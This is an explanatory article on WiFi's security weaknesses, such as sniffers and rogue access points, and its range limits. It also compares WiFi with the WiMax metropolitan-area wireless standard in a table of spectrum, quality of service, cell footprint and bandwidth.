The popular version of wireless networking, known as WiFi, revolutionized the ways that both small home-offices and larger facilities work, making it trivial to extend bandwidth into areas where it was impractical or too expensive to run Ethernet cable. For a while it seemed as if WiFi offered instantly deployable, easily configurable, and most importantly mobile communications to the masses.

Soon, however, over-the-air sniffers, such as kismet and airsnort, allowed attackers to capture and decode data transmitted via WiFi. Rogue access points -- often illicitly deployed by users seeking easier access -- opened security holes deep within companies' enterprises, allowing attackers to completely circumvent traditional protections, such as firewalls and IDS, and simply break in through a wide-open back door. These rogue access points also became a useful way for attackers to capture passwords, credit card numbers, and other sensitive information.

It didn't take long for information technology professionals to realize that the promised land of WiFi was rife with risks, vulnerabilities, and unforeseen dangers that still cause significant security challenges today.

In addition, WiFi has caused many technical headaches. Its effective coverage radius, also known as the "cell radius," is fairly small -- typically a few hundred feet when used with omnidirectional antennas like those in your typical laptop. WiFi also has pretty substantial bandwidth limitations that make it impractical for high-density user environments or as a last-mile transport-layer solution. Over the years these technical challenges, along with the security problems, have been addressed in large part by constantly evolving standards and by bolting security controls on top of WiFi. Examples include Wired Equivalent Privacy (WEP) encryption, WiFi Protected Access (WPA) encryption, and 802.1x.

Yet, without using highly directional and large antennas, WiFi still wasn't the optimum solution for large metropolitan-scale or long-haul point-to-point links. This is the reason WiMax and similar standards were born.

Wireless Compared

Recommended Uses
  WiFi: Short-range, LAN-centric
  WiMax: Long-range, MAN-centric

Spectrum
  WiFi: Unlicensed spectrum (802.11b/g – 2.4 GHz; 802.11n – 2.4 GHz, 5 GHz)
  WiMax: Unlicensed or licensed spectrum between 2-66 GHz (US: 2.4 GHz; International: 2.3 GHz, 3.5 GHz)

Quality of Service
  WiFi: Minimal - QoS is relative only between packets/flows
  WiMax: Guaranteed - QoS is assured using scheduling algorithms at the MAC layer

Cell Footprint
  WiFi: < 300 meters maximum; most implementations about 30 meters
  WiMax: Up to 10 kilometers; most implementations about 3 km

Bandwidth
  WiFi: 802.11b: 11 Mbps max; 802.11g: 54 Mbps max; 802.11n: at least 100 Mbps (all at short range)
  WiMax: Up to 70 Mbps theoretical max; up to 40 dedicated subscriber channels; expect 15 Mbps at 3 km range

Table 1 - A comparison of typical WiFi and WiMax performance characteristics

WiMax refers to a standard designed to provide high-bandwidth wireless services on a metropolitan-area scale. It provides much greater bandwidth than WiFi, allowing users to share up to 70 Mbps per channel at short range -- although 10 Mbps at 10 km is more typical -- in fixed implementations. Each channel can be split between up to 40 simultaneous users (roughly 70 Mbps / 40 = 1.75 Mbps each at short range), providing symmetric speeds that rival a traditional DSL connection.

While WiFi has moved into high-bandwidth solutions with the advent of the draft 802.11n specification, which provides theoretical bandwidth maximums up to 248 Mbps, the true advantage WiMax maintains is in cell radius. Even with 802.11n, WiFi is typically limited to ranges under 300 meters without specialized equipment. In contrast, WiMax provides a much larger cell radius -- up to 3 km in fixed applications -- without significantly degrading its available bandwidth. These key features are the reason the WiMax standard is considered one of the leading contenders for the future of wireless broadband, for use in metropolitan area networks (MAN) and as the underpinnings of 4G cellular networks.